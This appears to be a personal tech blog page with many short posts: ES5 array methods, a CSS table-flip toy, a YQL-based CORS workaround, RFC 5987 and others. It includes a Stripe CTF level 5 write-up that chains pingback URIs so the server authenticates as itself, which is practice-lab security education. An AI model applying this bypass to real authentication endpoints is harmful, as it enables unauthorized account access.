“Jon Hamm And Adam Scott’s ‘Greatest Event In TV History’ Was A Tribute To A Forgotten ’80s Classic
If you know more about Simon and Simon than its intro and general premise, you’re better at TV than I am. If you’ve never heard of Simon and Simon, you’re the BEST at TV because, honestly, Simon & Simon — a CBS series about two mismatched brothers who ran a private detective service; it ran for eight seasons — wasn’t good.
Source: Uproxx”
Level 5 of the Stripe CTF revolved around a design issue in an OpenID-like protocol.
# The level's check: any non-word character, the literal AUTHENTICATED,
# then only non-word characters to the end of a line.
def authenticated?(body)
  body =~ /[^\w]AUTHENTICATED[^\w]*$/
end
...
if authenticated?(body)
  session[:auth_user] = username
  session[:auth_host] = host
  # Note: the response dumps the remote server's body back to the caller.
  return "Remote server responded with: #{body}." \
         " Authenticated as #{username}@#{host}!"
This level implements a federated identity protocol: you give it an endpoint URI plus a username and password, it POSTs the username and password to that endpoint, and if the response is 'AUTHENTICATED' then access is granted. It is easy to be authenticated by a server you control, but this level requires you to authenticate as the server running the level itself. The level only talks to Stripe CTF servers, so the first step is to upload a document containing the text 'AUTHENTICATED' to the level 2 server, which lets us authenticate as level 2. Notice also that the level 5 server dumps out the content returned by the endpoint URI, and that the regexp it uses to detect 'AUTHENTICATED' can match on that dump. Accordingly, I uploaded a file containing 'AUTHENTICATED' to
https://level02-2.stripe-ctf.com/user-ajvivlehdt/uploads/authenticated
Using that as my endpoint URI means authenticating as level 2. I can then choose the following endpoint URI to authenticate as level 5.
https://level05-1.stripe-ctf.com/user-qtoyekwrod/?pingback=https%3A%2F%2Flevel02-2.stripe-ctf.com%2Fuser-ajvivlehdt%2Fuploads%2Fauthenticated&username=a&password=a
Navigating to that URI results in the level 5 server telling me I'm authenticated as level 2, and its response includes the text of the level 2 file, 'AUTHENTICATED'. Feeding that URI back into the level 5 server as my endpoint URI means level 5 sees 'AUTHENTICATED' coming back from a level 5 URI, so I'm authenticated as level 5.
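Concretely, the two pingback URIs can be built like this (a quick sketch in script; the hosts and paths are the ones from my instance above, and the username/password values are arbitrary):

// Sketch of the two-step chain; hosts and paths are from my instance above.
var level2Upload = "https://level02-2.stripe-ctf.com/user-ajvivlehdt/uploads/authenticated";
var level5Base = "https://level05-1.stripe-ctf.com/user-qtoyekwrod/";

// Step 1: point level 5 at the uploaded file. The response says
// "authenticated as level 2" and dumps the file's 'AUTHENTICATED' text.
var step1 = level5Base + "?pingback=" + encodeURIComponent(level2Upload) +
            "&username=a&password=a";

// Step 2: point level 5 at the step 1 URI. That page is served from a
// level 5 host and still contains text the permissive regexp matches,
// so level 5 now reports "authenticated as level 5".
var step2 = level5Base + "?pingback=" + encodeURIComponent(step1) +
            "&username=a&password=a";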
I didn't see any particular code-review red flags; really, the issue here is that the regular expression testing for 'AUTHENTICATED' is too permissive and the protocol itself doesn't do enough. The protocol only requires a fixed piece of literal text to be returned, which makes it easy for a server to fall into authenticating accidentally. Requiring the endpoint URI to return variable text based on the request would make it much harder for a server to accidentally authenticate.
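As a sketch of what that could look like (not the level's code, and in JavaScript rather than the level's Ruby): the verifier sends a fresh random challenge with each attempt and only accepts a response that echoes that exact challenge back.

// Hypothetical challenge-response sketch (Node.js), not the level's actual code:
// a fresh nonce per attempt means a server can't accidentally authenticate
// by happening to serve a fixed literal string.
var crypto = require("crypto");

function makeChallenge() {
    return crypto.randomBytes(16).toString("hex");
}

function authenticated(body, challenge) {
    // Accept only a whole line echoing this attempt's challenge,
    // instead of the fixed literal 'AUTHENTICATED'.
    return body.split(/\r?\n/).some(function (line) {
        return line.trim() === "AUTHENTICATED:" + challenge;
    });
}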
Stripe is running a web security capture-the-flag: a series of increasingly difficult web security exploit challenges. I've finished it and had a lot of fun. Working on a web browser, I knew the theory behind these various web-based attacks, but this was my first chance to put theory into practice.
Here's a blog post on the CTF's behind-the-scenes setup, which has many impressive features, including phantom users that can be XSS'd and CSRF'd.
I'll have another post on my difficulties with, and answers for, the CTF levels after the contest ends on Wednesday, but if you're looking for hints, try the CTF chatroom or the level-specific CTF chatroom.
We believe Knight accidentally released the test software they used to verify that their market making software functioned properly, into NYSE’s live system.
I get chills breaking the build at work. I can’t imagine how much worse it would feel to deploy your test suite and destroy the company you work for.
Won’t someone think of the URIs?! At some point in the not-too-distant past, MSDN changed how you link to documentation and broke all existing links. This included some of the links in documents on MSDN.
(via Feature: Google gets license to test drive autonomous cars on Nevada roads)
The coolest part of this article is that Nevada now has an autonomous-vehicle license plate with a red background and an infinity symbol on the left.
The Metro Developer Show is the first podcast exclusively for Metro developers and enthusiasts.
Each week Ryan and Travis Lowdermilk traverse the exciting world of Metro (phone, tablet, desktop, and Xbox), covering the latest news and exploring what it means for the developer community and everyday users.
The goal of this experiment was to combine the flipping-tables emoticon with the Threw It On The Ground video using shiny new HTML5-ish features, and the end result is the table flipper flipping the Threw It On The Ground video.
The table-flipper emoticon is CSS ::before content that changes on hover. Additionally, on hover a CSS transform is applied to flip the video upside down several times and move it to the right, and a CSS transition animates the flipping. The only issue I ran into is that (at least on Windows) Flash doesn't like having CSS transform rotations applied to it, so to get the most out of the flip experiment you must opt in to HTML5 video on YouTube. And of course you must use a browser that supports the various things I just mentioned, like the latest Chrome (or the not-yet-released IE10).
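I did this in pure CSS, but a rough script-driven equivalent of the same transform-plus-transition idea would look something like this (the #flipper id and the distances are made up, and era-appropriate vendor prefixes are omitted):

// Rough script-driven equivalent of the CSS hover flip described above;
// the #flipper element and the distances are made up for illustration.
var flipper = document.getElementById("flipper");
flipper.style.transition = "transform 2s ease-in-out";
flipper.addEventListener("mouseenter", function () {
    // Five half-turns leave the video upside down, shifted to the right.
    flipper.style.transform = "translateX(300px) rotate(900deg)";
});
flipper.addEventListener("mouseleave", function () {
    flipper.style.transform = "none";
});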
One of the more limiting issues of writing client-side script in the browser is the same-origin limitation of XMLHttpRequest. The latest versions of all browsers support a subset of CORS, which lets servers opt particular resources in to cross-domain access. Since IE8 there's XDomainRequest, and in all other browsers (including IE10) there's XHR L2's cross-origin request support. But the vast majority of resources out on the web don't opt in with CORS headers, so client-side-only web apps like a podcast player or a feed reader aren't doable.
One hacky way around this I've found is to use YQL as a CORS proxy. YQL applies the CORS header to all of its responses, and among its features it allows a caller to request an arbitrary XML, HTML, or JSON resource. So my network helper script first attempts to access a URI directly, using XDomainRequest if it exists and XMLHttpRequest otherwise. If that fails, it tries to use XDR or XHR to access the URI via YQL. I wrap my URIs in the following manner, where type is either "html", "xml", or "json":
yqlRequest = function(uri, method, type, onComplete, onError) {
    // Build a YQL query that fetches the target URI via the html, xml, or json table.
    var yqlUri = "http://query.yahooapis.com/v1/public/yql?q=" +
        encodeURIComponent("SELECT * FROM " + type + ' where url="' + encodeURIComponent(uri) + '"');
    if (type == "html") {
        // Select the document root so the full page comes back.
        yqlUri += encodeURIComponent(" and xpath='/*'");
    }
    else if (type == "json") {
        // Ask for plain JSON back and suppress the JSONP callback wrapper.
        yqlUri += "&callback=&format=json";
    }
    ...
This also means I can get JSON data itself without having to go through JSONP.
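For completeness, the surrounding fallback logic looks roughly like this (a simplified sketch, not the full helper; directRequest and request are illustrative names, and the YQL path hands back YQL's wrapped response rather than the raw body):

// Simplified sketch of the fallback described above: try the URI directly
// (XDomainRequest on IE8/9, XMLHttpRequest elsewhere) and only fall back
// to the YQL proxy if the direct cross-origin request fails.
function directRequest(uri, method, onComplete, onError) {
    var xhr = window.XDomainRequest ? new XDomainRequest() : new XMLHttpRequest();
    xhr.onload = function () { onComplete(xhr.responseText); };
    xhr.onerror = onError;
    xhr.open(method, uri);
    xhr.send();
}

function request(uri, method, type, onComplete, onError) {
    directRequest(uri, method, onComplete, function () {
        // No CORS headers on the resource; proxy the request through YQL.
        yqlRequest(uri, method, type, onComplete, onError);
    });
}

// Example: fetch a feed that doesn't send CORS headers.
request("http://example.com/podcast.xml", "GET", "xml",
    function (response) { console.log("got feed", response); },
    function () { console.log("request failed"); });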
FTA: “Nick Bilton put the FAA’s claims regarding Kindles and airline avionics to the test. The result? They emit less EM interference than planes are required by law to withstand.” Much less, apparently.
Cool and (relatively) new methods on the JavaScript Array object are here in the most recent versions of your favorite browser! More about them in the ECMAScript 5 spec, on MSDN, the IE blog, or Mozilla's documentation. Here's the list that's got me excited: indexOf, lastIndexOf, every, some, forEach, map, filter, reduce, and reduceRight.
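A quick, throwaway demo of a few of them (made-up data):

// ES5 Array additions in action.
var nums = [3, 1, 4, 1, 5, 9, 2, 6];

nums.indexOf(4);                                                 // 2
nums.some(function (n) { return n > 8; });                       // true
nums.every(function (n) { return n > 0; });                      // true
var evens = nums.filter(function (n) { return n % 2 === 0; });   // [4, 2, 6]
var doubled = nums.map(function (n) { return n * 2; });          // [6, 2, 8, 2, 10, 18, 4, 12]
var sum = nums.reduce(function (acc, n) { return acc + n; }, 0); // 31
nums.forEach(function (n) { console.log(n); });
Array.isArray(nums);                                             // true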
“TechCrunch and others are reporting that a program called “Carrier IQ” that comes pre-installed on Sprint phones has some pretty amazing spyware capabilities, right down to keylogging everything you do on the phone.”
From the document: ‘Appendix B. Implementation Report: The encoding defined in this document currently is used for two different HTTP header fields: “Content-Disposition”, defined in [RFC6266], and “Link”, defined in [RFC5988]. As the encoding is a profile/clarification of the one defined in [RFC2231] in 1997, many user agents already supported it for use in “Content-Disposition” when [RFC5987] got published.
Since the publication of [RFC5987], two more popular desktop user agents have added support for this encoding; see http://purl.org/NET/http/content-disposition-tests#encoding-2231-char for details. At this time, only one major desktop user agent (Safari) does not support it.
Note that the implementation in Internet Explorer 9 does not support the ISO-8859-1 encoding; this document revision acknowledges that UTF-8 is sufficient for expressing all code points, and removes the requirement to support ISO-8859-1.’
Yay for UTF-8!
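For the curious, the encoding in question carries non-ASCII parameter values as percent-encoded UTF-8, e.g. Content-Disposition: attachment; filename*=UTF-8''na%C3%AFve.txt. A small sketch of building such a value in script (the extra replace handles a few characters encodeURIComponent leaves alone but RFC 5987 doesn't allow bare):

// Sketch: build an RFC 5987-style Content-Disposition value for a UTF-8 filename.
function encodeRFC5987(value) {
    return encodeURIComponent(value)
        // encodeURIComponent leaves '()* alone, but RFC 5987 wants them percent-encoded.
        .replace(/['()*]/g, function (c) {
            return "%" + c.charCodeAt(0).toString(16).toUpperCase();
        });
}

var header = "attachment; filename*=UTF-8''" + encodeRFC5987("naïve résumé.txt");
// => attachment; filename*=UTF-8''na%C3%AFve%20r%C3%A9sum%C3%A9.txt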